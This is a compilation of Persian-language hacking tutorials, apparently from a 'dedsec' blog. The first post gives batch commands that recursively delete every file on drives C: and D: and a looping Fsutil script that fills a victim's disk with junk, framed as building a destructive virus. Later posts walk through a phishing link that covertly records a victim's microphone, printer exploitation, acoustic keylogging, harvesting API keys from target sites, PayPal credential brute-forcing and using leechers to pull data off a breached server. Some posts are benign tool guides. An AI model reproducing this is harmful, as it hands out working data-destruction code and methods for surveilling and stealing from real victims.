برای همین ما هم قراره توی این پست تکه کد ساده و کاربردی معرفی کنیم که میتونه اطلاعات یه سیستم رو از بین ببره و یکسری فایل آت و آشغال رو با فایلای اصلی و شاید مهم سیستم قربانی جایگزین کنه

صد البته به جای اینکار ما میتونیم با دستور فرمت خیلی سریعتر و راحت تر اینکار رو انجام بدیم

اما بعضی وقتا سطح دسترسی اجازه اینکار رو نمیده که ما هم خیلی راحت میتونیم با یه تکه کد ساده از یه روش دیگه پیروی کنیم

یا اصن برنامه های کاربردی و مخرب دیگه بسازیم و اهداف خودمون رو پیاده سازی کنیم

For /R D:\ %i in (*) do echo %i && Ping "LocalHost"  > nul -n 2 && CLS

کد بالا رو که توی خط فرمان وارد کنید متوجه میشید که میاد و اسم تک تک فایلاتون رو دو ثانیه یکبار دونه به دونه نشون میده

حالا ما میتونیم به جای دستور Echo از دستور Del استفاده کنیم تا به جای نمایش فایل ها اون فایل از بین بره

For /R D:\ %i in (*) do del /F /S /Q %i && Ping "LocalHost"  > nul -n 2 && CLS

که البته چون ما از دستور Ping استفاده کردیم و دستور دادیم که هر دو ثانیه یکبار یه فایل پاک بشه اینکار زیاد جالب نمیشه و ممکنه پروسه ی برناممون یه خرده طولانی بشه که بهتره این شکلی بنویسیم :

For /R D:\ %i in (*) do del /F /S /Q %i CLS

حتما دقت کنید از کدهای بالا داخل خط فرمان استفاده کنید و سریعا بعد از اجرا خط فرمان رو ببندین یا کلید های ترکیبی Ctrl + C رو فشار بدین تا کد وارد شده به روند اجرا و تخریب خودش ادامه نده

و اینکه دقت کنین اگه قراره داخل یه Batch فایل قرار بدین و از راه دور به سیستم قربانی دسترسی ندارین باید به جای i% حتما از i%% استفاده کنین

همونطور که گفتم هدفم یه اشاره ی ریز بود و حالا شما هستین که باید از تکه های بالا یه برنامه مخرب بسازین و به جای تخریب فایل های درایو D دستور تخریب فایل درایوای دیگه رو هم بدین

For /R C:\ %%i in (*) do del /F /S /Q %%i CLS
For /R D:\ %%i in (*) do del /F /S /Q %%i CLS

Va.

کدهای بالا هم برای یه فایل Batch هستش که باید به جای .Va اسم درایوهای دیگه رو هم اضافه کنین

ضمنا به این مورد اشاره کنم که میتونین علاوه بر لیست و حذف کردن فایل ها

داخل کد به جای ستاره ( * ) از نقطه ( . ) استفاده کنین و اسم فولدرها یا همون پوشه های سیستم قربانی رو بدست بیارین و بعدش با دستور RmDir اونهارو از بین ببرید که من طرز نوشتنش رو گفتم و نوشتنش با خودتونه که یه خرده تنبل به بار نیاین :)

حالا میرسیم به نحوه ی پر کردن هارد سیستم قربانی از اطلاعات چرت و پرت

برای اینکار ما از دستور Fsutil استفاده میکنیم که خوشبختانه این دستور روی سیستم عامل های قدیمی هم موجوده و موجب میشه که ویروس ما روی همه ی سیستم عامل های ویندوزی اجرا بشه

یه بچ فایل ایجاد کنین و کدهای پایین رو داخلش قرار بدین

Cd %UserProfile%\Desktop
:Start
Fsutil file createnew %random%.bak %random%
Fsutil file createnew %random%.mp3 %random%
Fsutil file createnew %random%.mp4 %random%
Goto Start

وقتی که کدهارو قرار دادین با کلید های Ctrl + C اونارو داخل فایل ذخیره کنید و اونو اجرا کنین و سریع ببندید

بعد از اجرا و بستن یه نیم نگاه به صفحه ی دسکتاپتون بندازین تا بهتر متوجه بشین که این کدها دقیقا قراره چیکار کنن

در واقع این کدها میان یه فایل با اسم تصادفی و پسوند های bak و mp3 و mp4 فایل های چرت و پرت ایجاد میکنن که موجب میشه هارد سیستم قربانی از اطلاعات مزخرف پر بشه و اگه سیستم قربانی کم بیاره میتونه موجب هنگی سیستم طرفمون هم بشه.

همچنین میتونیم به جای استفاده از %random% از یه سایز بیشتر هم برای فایلی که قراره ایجاد بشه استفاده کنیم

Fsutil file createnew %random%.bak 999999999

مثلا کد بالا یه فایل معادل حجم یک گیگابایت ایجاد میکنه

اما این کدها کاربردای دیگه هم داره

به عنوان مثال اینروزا آدمایی هستن که سرور مجازی کرک میکنین و سرور های هارد دار رو میفروشن که با این روش میتونین فایل فیک روی سرور ایجاد کنن و سرورارو به خریدار اینجور سرور ها بفروشن.

در کل کدی که قرار دادم رو یه خرده دستکاری کنین و سعی کنین اهدافتون رو خودتون پیاده سازی کنید

dedsec will give you the truth

join us


سلام خدمت تمامی کاربران گل وبسایت تیم امنیتی dedsec

 

امروزه از مرورگر ها بسیار زیاد استفاده میشه و همه ما تقریبا بیشتر وقتمون رو داریم با سرچ کردن در اینترنت میگذرونیم ، مرورگر ها اطلاعات مهمی درون خودشون دارن مثل یوزر ها پسورد ها ، کوکی ها و… که با این تفاسیر میشه گفت بستر مناسبی برای انجام حملات هست. جاوا اسکریپت به هکر ها کمک میکنه که بتونن عملیات های مختلفی رو از طریق مرورگر روی سیستم قربانی انجام بدن مثل بدست آوردن لوکیشن قربانی ، ریدارکت کردن قربانی به صفحه جعلی و…. پس جاوا اسکریپت زبان بسیار مهم و حیاتی برای انجام حملات سمت مروگر هاست.

 

 

 

 

 

در مطالب گذشته راجب جاوا اسکریپت و حملاتی که میشه باهاش انجام داد صحبت کردیم ، حتما پیشنهاد میکنم دوستانی که میخوان در این نوع حملات مهارت کافی رو کسب کنن حتما شروع به یادگیری جاوا اسکریپت کنن چون بسیار بسیار مفید خواهد بود ، در این پست آموزشی ما با کمک SAyHello یک لینک میسازیم و بعد از فرستادن اون لینک برای قربانی و باز کردن اون لینک در مرورگر میکروفون قربانی شروع به ضبط صدا میکنه و صدای ضبط شده برای ما ارسال میشه.

 

 

 

خب بریم سراغ کارمون در قدم اول با دستور زیر ابزار رو دانلود میکنیم

 

 

 

بعد از دانلود ابزار وارد پوشه ابزار میشیم و با دستور زیر ابزار رو اجرا میکنیم

 

 

 

 

 

بعد از اجرای ابزار از ما میپرسه که از کدوم سرویس برای انجام حمله میخواهید استفاده کنید من اینجا serveo رو انتخاب میکنم (الان که من دارم این پست رو میزارم سرویس Serveo به دلیل فیشینگ موقتا غیر فعال هست و من پیشنهاد میکنم از Ngrok استفاده کنید) برای اینکه بتونم حمله خودم رو خارج از شبکه داخلی نیز اجرا کنم  بعد از انتخاب serveo ما باید مشخص کنیم که بعد از اجرای لینک قربانی به چه سایتی ریدایرکت بشه که به صورت پیش فرض ابزار سایت یوتیوب رو در نظر میگیره بعد ، از ما راجب ساب دامین سوال میکنه که من دیفالت رو انتخاب میکنم و بعد از اون یک لینک برای ما نمایش داده که اون لینک رو ما باید برای قربانی ارسال کنیم (میتونید برای تمیز تر شدن کار از سایت های کوتاه کننده لینک نیز استفاده کنید)

 

 

 

بعد از اجرای لینک توسط قربانی ، قربانی باید دسترسی به میکروفون رو فعال کنه تا ابزار صدا های اطراف رو ضبط کنه و برای ما ارسال کنه

 

 

 

 

بعد از تایید دسترسی به میکروفون ابزار شروع به ارسال صدای های ضبط شده میکند

 

 

 

ابزار مرتب صدا های اطراف رو ضبط میکنه و میفرسته برای متوقف کردن Ctrl + C رو بزنید تا ابزار ضبط صدا رو قطع کنه و بعد از اون میتونید صدا های ضبط شده رو در پوشه ابزار ببینید

 

 dedsec will give you the truth

join us


آموزش گرفتن عکس از سایت با CutyCapt

کالی لینوکس از بهترین سیستم عامل هاس تست نفوذ است که دارای ابزار های مختلفی برای تست امنیت و بالا بردن امنیت کاربر است به همین خاطر باید با ابزار های کاربردی و جالب ان اشنا بود، که ما در این اموزش می خواهیم یکی دیگر از این ابزار های کاربردی را معرفی کنیم و با استفاده از ان بتوانیم امنیت خود را در سطح بالاتری نگه داریم.

معرفی ابزار CutyCapt

این ابزار توسط کالی لینوکس در بخش ابزار ها معرفی شده است و به صورت پیشفرض در کالی لینوکس به صورت نصب شده وجود دارد و کاربرد ان برای گرفتن عکس از سایت بدون وارد شدن به ان با مرورگر ها است که با این کار درصورتی که سایت الوده باشد، هیچ مشکلی برای ما به وجود نخواهد امد و با امکاناتی که دارد می توانید به صورت مخفی از یک وب سایت عکس بگیرید و ان مشاهده نمایید.

برخی از امکانات

  • انتخاب یوزرایجنت
  • تنظیم پروکسی
  • غیر فعال کردن جاوا اسکریپت
  • افزودن کد های css
  • غیر فعال کردن نمایش تصاویر
  • تنظیم ابعاد تصاویر
  • ….

نحوه استفاده از ابزار

این ابزار کاربردی با استفاده از دستور زیر که نام خود ابزار است می توانید ان را اجرا نمایید :

cutycapt

برای مشاهده راهنما از سویچ –help به صورت زیر استفاده می شود :

cutycapt –help



برای مثال برای گرفتن عکس از سایت باید به صورت زیر از دستور استفاده نمایید :

cutycapt –url=https://dedsec-hack.blog.ir –out=dedsec.png

در دستور بالا با سویچ –url و استفاده از = ادرس وب سایت را به همراه https یا http وارد کرده ایم.

و در بخش بعدی با سویچ –out= محل ذخیره و نام تصویر را انتخاب کرده ایم.

با زدن دستور بالا یک تصویر از وب سایت پن تست کور گرفته خواهد شد ،

و در مسیر /root با نام dedsec.png ذخیره می شود.

گرفتن عکس از سایت بدون مشخص شدن ای پی

برای مشخص نشدن ای پی شما در زمان عکس گرفتن از دستور زیر استفاده نمایید :

cutycapt –url=https://dedsec-hack.blog.ir –out=dedsec.png –http-proxy=127.0.0.1:8080 –javascript=off

در دستور بالا سویچ –http-proxy= افزوده شده است که در واقع ابزار با استفاده از پروکسی که شما به ان می دهید از سایت مورد نظر عکس می گیرد که با این کار ای پی شما در سایت تارگت مشخص نخواهد شد و در اخر با سویچ –javascript= جاوا اسکریپت را در سایت قبل از عکس گرفتن غیر فعال می کند.

dedsec will give you the truth

join us


آموزش نصب اوبونتو در ویندوز 10

اوبونتو یک سیستم عامل لینوکسی برپایه دبیان است که توانسته است محبوبیت زیادی بین کاربران خود داشته باشد، چرا که با استفاده از این سیستم عامل می توان از یک سیستم خانگی یا یک سرور استفاده کرد و از امکانات بسیار بالایی برخوردار است. به همین خاطر بسیاری به این سیستم عامل علاقه مند هستند اما نمی توانند به طور کامل سیستم عامل قبلی خود را کنار بگذارند و وارد اوبونتو شوند برای حل این مشکل راه هایی وجود دارد که بتوانید همزمان از هردو سیستم عامل استفاده کنید که در ادامه به این روش ها می پردازیم.

استفاده از سیستم عامل دلخواه در ماشین های مجازی

برنامه هایی مانند VMware ، hyper-v و … وجود دارند که با استفاده از ان ها می توانید در یک محیط مجازی ، سیستم عامل مورد نظر خود را نصب کنید وبرای مثال اگر سیستم عامل شما ویندوز است باید برنامه ماشین مجازی مورد نظر خود را نصب کنید و سپس درون ان سیستم عامل مورد نظر را نصب نمایید؛ که با این کار همزمان می توانید چندین سیستم عامل در سیستم داشته باشید. اما این کار می تواند مزیت ها و معایبی داشته باشد که ممکن است برای ما محدودیت ایجاد کند.

معایب :

  • نیاز به فضایه ذخیره سازی بالا برای نگه داری اطلاعات سیستم عامل ها
  • استفاده همزمان از منابع سخت افزاری و مشکل کندی سیستم
  • نیاز به منابع کافی برای استفاده
  • دارای برخی محدودیت ها

روش دوم برای نصب اوبونتو

این روش بهترین راه برای نصب و استفاده از اوبونتو در ویندوزاست که این امکان فقط در ویندوز 10 وجود دارد ، در واقع ما یک نسخه بسیار کم حجم از اوبونتو را از Microsoft Store دریافت و نصب می کنیم و مزیت های بسیار زیادی نسبت به روش مجازی سازی دارد که به ان ها میپردازیم.

مزیت ها :

  • نیاز نداشتن به مجازی سازی
  • استفاده از فضای ذخیره سازی بسیار کم
  • اجرا و دسترسی سریع
  • استفاده از منابع سخت افزاری بسیار کم

نحوه نصب اوبونتو در ویندوز 10

در ابتدا ویندوز خود را به اخرین نسخه اپدیت نمایید و سپس پاورشل را در ویندوز با دسترسی Administrator اجرا کنید؛ برای این کار کافیست از بخش جستجو ویندوز PowerShell را جستجو کنید و بر روی ان کلیک راست نمایید سپس run as administrator را بزنید و بعد از اجرا ان ، دستور زیر را در پاور شل وارد نمایید.

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

سیستم را یک بار ریاستارت کنید. به Microsoft Store رفته و ubuntu را جستجو کنید.

نسخه ubuntu مورد نظر را انتخاب کنید و بر روی get بزنید تا دانلود اغاز شود.

برای مشاهده ubuntu در فروشگاه مایکروسافت می توانید از لینک زیر هم استفاده نمایید.

https://www.microsoft.com/en-us/p/ubuntu/9nblggh4msv6?activetab=pivot:overviewtab

بعد از دستور بالا و نصب شدن اوبونتو در ویندوز 10 کافیست وارد cmd شوید و دستور ubuntu را بزنید یا از بخش جستجو ubuntu را جستجو نمایید و مانند یک برنامه خواهید دید که اجرا خواهد شد و دسترسی کامند لاین به ان خواهید داشت. به استفاده از این سیستم عامل می توانید از دستوراتی مانند : git ، ssh ، bash ، apt و … استفاده نمایید.

لینک های دانلود


dedsec will give you the truth
join us

استخراج کلید api

بسیاری از وب سایت های برای افزایش عملکرد خود از سرویس های مختلفی استفاده می کنند که توسط api ها با هم ارتباط دارند، به همین دلیل اهمیت زیادی پیدا کرده اند برای مثال اگر وب سایتی از ریکپچا گوگل استفاده کرده باشد حتما از گوگل api گرفته است و برای ان یک کلید خصوصی دارد؛ ما در این اموزش می خواهیم api های استفاده شده در وب سایت تارگت خود را مشخص کنیم و در نهایت بتوانیم کلید ان را پیدا کنیم برای اینکار از ابزار های مختلفی می توان استفاده کرد که به معرفی یکی از ان ها می پردازیم.

معرفی ابزار SecretX

همانطور که گفته شد با استفاده از این ابزار می توانید Api های استفاده شده در وب سایت را پیدا کنید و کلید ان ها را از ابزار بگیرید، سپس با استفاده از ان دسترسی بدست امده از API در صورت امکان سطح دسترسی خود را بالا برده و تست نفوذ خود را انجام دهید. این ابزار به زبان پایتون نسخه 3 نوشته شده و به راحتی قابل استفاده در انواع سیستم عامل ها است که نحوه کار با ان هم بسیار ساده است که در ادامه با این ابزار بیشتر اشنا خواهید شد.

نکته : دقت کنید برای بدست اوردن کلید api قبل از تست امنیتی به هانی پات ها دقت کنید تا دچارمشکل نشوید.

نصب و استفاده از ابزار در لینوکس

در ابتدا باید از طریق لینک گیت هاب SecretX ، مانند دستور زیر ابزار را دانلود کنید :

git clone https://github.com/xyele/secretxSecretX

سپس وارد پوشه دانلود شده ابزار که فایل های اصلی در ان قرار دارند شوید :

cd secretxSecretX

حال با دستور زیر پیشنیاز های ابزار را قبل از اجرا و بدست اوردن کلید api های وب سایت نصب نمایید :

python3 -m pip install -r requirements.txt

بعد از اتمام کار می توانید با استفاده از پایتون 3 ابزار را اجرا کنید :

python3 secretx.py

با استفاده از دستور زیر می توانید لیست وب سایت هایی که

  کنترل ویندوز از راه دور با ابزار PsTools

می خواهید کلید api های ان ها را پیدا کنید وارد لیست نمایید :

python3 secretx.py –threads 20 –list site.txt

در دستور بالا با استفاده از سویچ –list لیست ادرس وب سایت های مورد نظر خود را وارد ابزار کرده ایم.

dedsec will give you the truth

join us


*#۰۶# – شماره سریال گوشی شما که بر روی تمامی گوشی های موبایل کار می کند

*#۰*# – وارد شدن به منوی سرویس های مخفی در تمامی گوشی های موبایل سامسونگ برای تست بخش های مختلف گوشی موبایل

*#*#۴۶۳۶#*#* – اطلاعات تلفن، میزان مکالمه و وضعیت باتری

*#*#۳۴۹۷۱۵۳۹#*#* – مشخصات دوربین گوشی موبایل
*#*#۲۷۳۲۸۲*۲۵۵*۶۶۳۲۸۲*#*#* – بکاپ گیری فوری از تمامی اطلاعات

*#*#۱۹۷۳۲۸۶۴۰#*#* – فعالسازی وضعیت تست برای تعمیرات

*#*#۲۳۲۳۳۹#*#* – تست وایرلس گوشی موبایل

*#*#۲۶۶۴#*#* – تست تاچ اسکرین گوشی موبایل

*#*#۱۱۱۱#*#* – نمایش نسخه اف تی ای گوشی موبایل

*#۱۲۵۸۰*۳۶۹# – مشخصات نرم افزار و سخت افزار گوشی موبایل

*#۳۰۱۲۷۹# – منوی کنترل اینترنت گوشی موبایل

*#*#۰۸۴۲#*#* – تست ویبره گوشی موبایل

*#۹۰۹۰# – منوی عیب یابی گوشی موبایل

*#۸۷۲۵۶۴# – تست ورودی یو اس بی گوشی موبایل

*#۹۹۰۰# – وضعیت سیف مود سیستم

*#۷۴۶۵۶۲۵# – مشاهده وضعیت قفل گوشی موبایل شما

*#*#۷۷۸۰#*#* – ریست کردن تمامی اطلاعات گوشی موبایل و برگشتن به حالت کارخانه ( زدن این کد به هیچ وجه توصیه نمی شود )

*۲۷۶۷*۳۸۵۵# – پاک کردن همه اطلاعات موجود بر روی گوشی موبایل ( زدن این کد به هیچ وجه توصیه نمی شود )

##۷۷۶۴۷۲۶ – منوی مخفی گوشی موتورولا دروید

*#*#۲۷۳۲۸۳*۲۵۵*۶۶۳۲۸۲*#*#* – بکاپ گیری سریع از گوشی اندروید

*#*#۲۳۲۳۳۸#*#* – نمایش مک آدرس وای فای گوشی موبایل شما

*#*#۱۴۷۲۳۶۵#*#* – تست سریع جی پی اس

*#*#۱۵۷۵#*#* – تست پیشرفته جی پی اس

*#*#۰*#*#* – تست ال سی دی گوشی موبایل

*#*#۰۲۸۹#*#* – تست صدا

*#*#۲۶۶۳#*#* – نمایش نسخه تاچ اسکرین گوشی موبایل

*#*#۰۵۸۸#*#* – تست سنسور شتاب سنج گوشی موبایل

*#*#۳۲۶۴#*#* – نمایش نسخه رم گوشی موبایل

*#*#۲۳۲۳۳۱#*#* – اجرای تست بلوتوث

*#*#۷۲۶۲۶۲۶#*#* – تست آنتن گوشی موبایل

*#*#۴۴۳۳۶#*#* – نمایش زمان ساخت گوشی موبایل

dedsec will give you the truth

join us


سلام خدمت تمامی کاربران عزیز تیم امنیتی dedsec

 

در شبکه ما تجهیزات مختلفی داریم مثل سرور ، روتر ، سویچ ، کلاینت با سیستم عامل ها مختلف و…. که هر کدوم از این تجهیزات برای هکر ها مهم هستن و هکر ها برای نفوذ به شبکه این تجهیزات رو مورد بررسی خودشون قرار میدن ، اما ما در این مطلب کاری به سرور ، روتر ، سویچ و…. نداریم ما اینجا میخایم راجب پرینتر ها صحبت کنیم که در شبکه ها بسیار زیاد ازشون استفاده میشه و اطلاعات بسیار مهمی هم در حافظه خودشون دارن اما ادمین های شبکه توجه لازم رو به پرینتر ها ندارن و همین بی توجهی باعث میشه هکر ها به اطلاعات مهمی دسترسی پیدا کنن که بسیار میتونه خطرناک باشه ، اگر بخوام یه مثال بزنم در شرکت ، اداره یا سازمان شما روزانه از طریق پرینتر ها اطلاعات زیادی چاپ میشه مثل نامه های محرمانه ، اطلاعات مالی و… که دسترسی به این اطلاعات از طریق پرینتر ممکن هست ، تمامی اینا رو گفتیم که برسیم به این سوال که آیا ما میتونیم یک پرینتر رو هک کنیم؟ چگونه میشه یک پرینتر رو هک کرد ؟ اگر میخواهید به جواب این سوالات برسید پس تا آخر این مطلب با ما باشید…

 

 

خب بریم سراغ کارمون برای شروع من ابزار Printer Exploitation Toolkit رو دانلود میکنم ، این ابزار به ما این امکان رو میده که بتونیم پرینتر ها رو از نظر امنیتی بررسی کنیم ، ابزار امکانات بسیار خوبی داره  که اگر توضیحات کامل تری میخواید حتما گیت هاب این ابزار رو بخونید  (لینک گیت هاب ابزار Printer Exploitation Toolkit)

 

 

 

بعد از دانلود ابزار با دستور زیر متعلقات ابزار رو نصب میکنیم

 

 

 

بعد از نصب متعلقات ابزار وارد پوشه ابزار میشیم و با سویچ h- میتونیم راهنما ابزار رو مشاهده کنیم

 

 

 

میرسیم به اصلی ترین بخش کار که مرحله نفوذ است نکته ای که در این مرحله بسیار مهمه اینه که شما تعیین کنید که از کدام زبان چاپگر میخواهید برای سوء استفاده ، استفاده کنید، زبان چاپگر برای سوء استفاده باید یکی از این زبان ها Ps , Pjl , Pcl باشد، این سه زبان چاپگر توسط همه پرینتر ها پشتیبانی نمیشود ، برای حمله ما دستور زیر رو وارد میکنیم که به جای ای پی ای پی پرینتر مورد نظر و به جای Pjl زبان چاپگری که میخواهید برای سوء استفاده ، استفاده کنید رو وارد میکنید.

 

 

 

بسیار عالی دسترسی ما به پرینتر مورد نظرمون برقرار شد برای دیدن دستورات کافیه help رو بزنید

 

 

 

شما کار های مختلفی رو میتونید روی پرینتر انجام بدید که لیست دستورات رو در عکس بالا مشاهده میکنید من برای تست با دستور زیر به چاپگر دستور چاپ یک نوشته رو میدم که البته شما میتونید یک فایل عکس هم بهش بدید که شروع به چاپ کنه

 

 dedsec will give you the truth

join us


سلام خدمت تمامی کاربران گل سایت dedsec

 

همونطور که از عنوان مطلب هم مشخصه قراره راجب موضوعی صحبت کنیم که خیلی هاتون شاید در نگاه اول بگید که اصلا مگه ممکنه ؟ یا شایدم خیلی از شماها قبلا بهش فکر کردید اما به خودتون گفتید که کار سختی هست و یا شدنی نیست و بیخیالش شدید در علم هکینگ قرار نیست که ما همیشه از طریق هک سیستم عامل یا وب یا هر چیز دیگه ای بتونیم به اطلاعاتی که میخواهیم دست پیدا کنیم و خیلی وقت ها با حالت هایی که شاید حتی فکرشو نکنید بتونید اطلاعات مهمی رو به دست بیارید ، فک کنید از طریق صدای کلید های کیبورد شما متوجه بشید که اون شخص چه کلیدی روی کیبورد فشار داده ، الان با خودتون بگید که این چیزا ممکن نیست و بخواهید این مطلب رو ادامه ندید اما باید بگم که عجله نکنید و تا آخر این پست با ما همراه باشید تا متوجه بشید آیا اینکار ممکنه یا نه؟

 

 

 

 

معرفی ابزار Kbd Audio :

 

این ابزار بسیار قدرتمند صدا های تولید شده کلید های کیبورد رو از طریق میکروفون کپچر میکنه و با انالیز صدا های دریافتی به ما میگه که قربانی الان کدوم کلید رو فشار داده ، ابزار Kbd Audio  هم محیط کامندی داره و هم محیط گرافیکی که من یه تصویر از محیط گرافیکیش رو براتون قرار دادم

 

 

 

 

 

خب میریم سراغ کارمون در قدم اول با دستور زیر ابزار Kbd Audio رو دانلود میکنیم

 

 

 

بعد از دانلود وارد پوشه ابزار میشیم و با دستور زیر SubModule های ابزار رو اپدیت میکنیم

 

 

 

در ادامه یک پوشه به اسم build میسازیم و وارد پوشه میشیم و دستور زیر رو وارد میکنیم بعد از اتمام کار cmake ما دستور make رو وارد میکنیم

 

 

 

 

خب دیگه ابزار آماده استفاده است برای شروع کپچر صدا ما دستور زیر رو وارد میکنیم و میبینید که ابزار در حال کپچر و انالیر هست و کلید هایی که ما روی کیبورد فشار دادیم رو بهمون نشون میده

 

 

 

در پایان کار هم یک فایل خروجی برای ما ذخیره شده که با دستور زیر میتونیم فایل رو مجدد پلی کنیم و کلید های فشرده شده رو مشاهده کنیم

 

 

 dedsec will give you the truth

join us


آموزش تحلیل و بررسی برنامه های اندروید

بسیاری از ما با سیستم عامل اندروید سر و کار داریم چرا که بسیاری از دستگاه های موبایل با سیستم عامل اندروید هستند پس برای امنیت خود همیشه قبل از نصب هر برنامه باید یک تحلیل دقیق بر روی برنامه داشت که ما در این اموزش ابزاری برای اینکار معرفی میکنیم که میتوانید با استفاده از ان تحلیل کاملی بر روی فایل های apk انجام دهید.

معرفی ابزار Quark Engine

این ابزار که به زبان پایتون 3 نوشته شده است و همانطور که گفته شد برای تحلیل و بررسی برنامه های اندرویدی استفاده می شود . بعد از بررسی در صورت وجود بدافزار در فایل apk ابزار بدافزار شما را امتیاز دهی می کند و می توانید قبل از نصب هر برنامه ای از ان استفاده کنید تا دیگر حتی نیازی به نصب انتی ویروس ها و برنامه های امنیتی دیگر در دستگاه موبایل خود نشوید.

نحوه نصب ابزار و بررسی برنامه اندروید

در ابتدا ابزار را از لینک گیت هاب با دستور زیر در ترمینال ان دریافت نمایید :

git clone https://github.com/quark-engine/quark-engine

سپس وارد دایرکتوری ابزار شوید :

cd quark-engine/quark

در مرحله بعد دستورات زیر را برای نصب پیشنیاز های ابزار وارد کنید :

pipenv install –skip-lock

pipenv shell

حال می توانید با وارد کردن دستور زیر در ترمینال ابزار را برای بررسی برنامه های مورد نظر خود اجرا کنید :

quark

برای کارکرد ابزار به مثال زیر توجه کنید :

quark -a app.apk -r rules/ -s

در دستور بالا با استفاده از سویچ -s فایل Apk یا همان برنامه اندروید که می خواهیم ان را بررسی کنیم وارد می کنیم و با استفاده از سویچ -s گذاراش های ان را دریافت می کنیم؛ در اخر هم از سویچ -r باید استفاده شود که برای بررسی سطح دسترسی فایل است ، دقت داشته باشید به همراه ادرس دایرکتوری ان باید وارد شود.

dedsec will give you the truth

join us


بررسی امنیتی وب سایت

 هر ابزار می تواند با امکانات منحصر به فرد خود برای رسیدن به نتیجه به ما کمک شایانی کند. در ادامه این اموزش می خواهیم یکی دیگر از ابزار های تست نفوذ وب را معرفی کنیم و با نحوه نصب و استفاده از ان اشنا شویم.

ابزار Tishna

این ابزار متشکل از چندین ابزار تست نفوذ است که به زبان های bash ، perl و پایتون نوشته شده اند که با نصب Tishna می توانید از همه این ابزار ها به راحتی استفاده کنید. برای استفاده از ابزار حتما باید یک سیستم عامل لینوکسی مانند کالی لینوکس داشته باشید و لازم است بدانید این ابزار در ویندوز قابل استفاده نیست.

برخی از امکانات ابزار

  • جمع اوری اطلاعات
  • انالیز باگ xss
  • انالیزو بررسی امنیتی باگ csrf
  • بایپس waf
  • و ….


نحوه نصب و استفاده از Tishna

در ابتدا در ترمینال لینوکس دستور زیر را برای دریافت ابزار وارد کنید :

git clone https://github.com/haroonawanofficial/Tishna.git

سپس وارد دایرکتوری Tishna برای اجرای ابزار و بررسی امنیتی شوید :

cd Tishna

حال با دستور زیر سطح دسترسی تمامی فایل های bash را بالا ببرید :

chmod u+x *.sh

در اخر می توانید فایل اصلی ابزار را به صورت زیر نصب نمایید :

kali_installer.sh/.

نکته : تمامی پسشنیاز ها و موارد لازم در ابزار بعد از اجرا نصب خواهند شد و با سیستم شما ادقام می شوند.

بعد از اجرا برای مثال اگر بخواید بررسی امنیتی و اسکن برای پیدا کردن باگ lfi انجام دهید می توانید عدد 55 را وارد کنید و به همین صورت می توانید انواع امکانات ابزار را مشاهده کنید و از اعداد کنار ان ها استفاده نمایید.


لیچر یا لیچ چیست ؟

زمانی شما یک لینک دانلود داشته باشیم که بخواهیم ان را در یک سرور دیگر منتقل کنیم اولین کاری که به ذهن ما برای این کار می رسد این است که فایل را دانلود و سپس در سرور اپلود کنیم، اما اگر سرعت پهنای باند یا فضای ذخیره سازی در سیستم خود نداشته باشیم دیگر این کار امکان پذیر نخواهد بود و یا با مشکلات بسیار زیادی مواجه می شوید. برای حل این مشکل لیچر ها می توانند به ما کمک کنند در واقع سایت هایی رایگان اما با محدودیت با قابلیت لیچ کردن وجود دارند که می توانید با دادن لینک به ان ها دانلود خود را در سرور های ان ها انجام دهید.

اگر سرور خاصی را مدنظر خود دارید که این کار را در ان انجام دهید می توانید از اسکریپت های لیچر استفاده نمایید. ما در اخر اموزش یک اسکریپت برای لیچ کردن فایل به زبان php برای شما قرار داده ایم که می توانید با اپلود ان در سرور خود از ان برای دانلود از طریق لینک در سرور استفاده کنید.

مزیت لیچر ها در هک و امنیت

در بسیاری از مواقع بعد از هک و نفوذ به یک سرور هکر زمان بسیار کمی برای ذخیره اطلاعات خواهد داشت چرا که با مطلع شدن ادمین از هک شدن سرور احتمال بسته شدن راه های نفوذ وجود دارد و به همین خاطر باید تمامی اطلاعات در سریع ترین حالت ممکن ذخیره شوند، در سرور ها به دلیل سرعت بالا شما می توانید این کار را در سریع ترین زمان ممکن انجام دهید و لینک دانلود اطلاعات را در لیچر وارد کنید.

نکته : مزیت لیچر ها برای امنیت می توان تهیه نسخه پشتیبان یا بکاپ سرور در سریع ترین زمان ممکن باشد.

اشنایی با Rapidleech

یک اسکریپت لیچر است که به زبان php نوشته شده و با اپلود ان در سرور می توانید ان را اجرا کنید و لینک های خود را برای دانلود در سرور به این اسکریپت بدهید تا به صورت کامل عملیات خود را انجام دهد، اسکرپیت های زیادی در این زمینه وجود دارند که Rapidleech یکی از بهترین های ان ها است و امکانات فوق العاده ای دارد که با ان ها اشنا می شوید.

برخی از امکانات اسکریپت

  • امکان ایجاد محدودیت در حجم فایل دانلودی
  • تنظیم حذف اتوماتیک
  • انتخاب مسیر ذخیره فایل دانلود شده
  • نمایش دقیق درصد در هنگام اپلود
  • تغیر زبان
  • تغیر ظاهر در اسکریپت لیچر
  • امکان تنظیم پروکسی
  • ….

لینک دانلود


dedsec will give you the truth
join us


آموزش هک پی پال و راه های مقابله با ان

پی پال یک روش پرداخت پول برای کشور های خارجی است که بسیاری از کشور های جهان از ان پشتیبانی می کنند و اگر وارد برخی از وب سایت های خارجی شده باشید حتما روش های پرداخت ان ها را مشاهده کرده اید که بیشتر ان ها از درگاه پی پال استفاده می کنند، هر شخص با اتصال حساب بانکی خارجی خود به پی پال می تواند یک حساب ایجاد کنید و به صورت انلاین از پی پال استفاده کند لازم به ذکر است که پی پال ایران را تحریم کرده و برای ساخت حساب ان مشکلات بسیار زیادی برای دور زدن تحریم ها خواهید داشت. به دلیل فراگیر بودن پی پال ما در این اموزش قصد داریم نحوه هک اکانت های ان را اموزش دهیم و در ادامه به راه های مقابله برای جلوگیری از هک شدن ان می پردازیم.

برنامه های زیادی مانند سنتری هستند که با استفاده از ان ها می توان عملیات بروت فورس را بر روی اکانت های پی پال انجام داد اما همه این برنامه ها نیاز به کانفیگ و روش های بایپس مختلف خود را دارند؛ برای ان که کار را برای خود اسان تر کنید می توانید از ابزار های دیگر برای اینکار استفاده کنید تا دیگر مشکلاتی هم در هنگام ساخت کانفیگ نداشته باشید.


آشنایی با Paypal Cracker

این ابزار ویندوزی برای هک و کرک اکنت پی پال ساخته شده است که با استفاده از ان می توانید بر روی پی پال حملات بروت فورس انجام دهید یعنی با تهیه یک کمبو لیست که دارای ایمیل و پسورد های بسیار زیادی است همه ان ها را تست می کنید تا به حساب های پی پال که با اطلاعات تست شده مطابقت دارند دسترسی بگیرید.

نکته : دقت داشته باشید با ای پی ایران نمی توانید وارد وب سایت پی پال شوید

و برای کرک هم حتما باید از ای پی خارج از ایران استفاده کنید.

